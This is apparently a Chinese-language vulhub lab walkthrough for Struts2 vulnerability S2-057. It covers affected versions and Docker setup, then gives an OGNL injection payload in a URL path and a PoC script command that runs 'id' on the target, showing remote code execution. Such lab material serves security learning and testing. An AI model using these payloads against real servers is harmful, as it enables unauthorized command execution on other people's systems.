影響環境
Struts <= Struts 2.3.34, Struts 2.5.16
環境搭建
cd vulhub/struts2/s2-057
docker-compose up -d
啓動環境後,訪問http://your-ip: 8080/show/,您將看到Struts2測試頁面。
利用
S2-057要求具備以下條件:
action元素沒有設置名稱空間屬性,或者使用了通配符
名稱空間將由用戶從uri傳遞並解析爲OGNL表達式,最終導致遠程代碼執行漏洞。
Payload:
http://your-ip:8080/%24%7b%31%2b%31%7d/actionChain1.action
可以看到算出了1+1=2的結果
參考POC :https://github.com/Fnzer0/S2-057-poc
python 1.py -u http://192.168.111.129:8080/{{INJECTION_POINT}}/actionChain1.action -p S2-057-2 -c id --exp
發現執行了id命令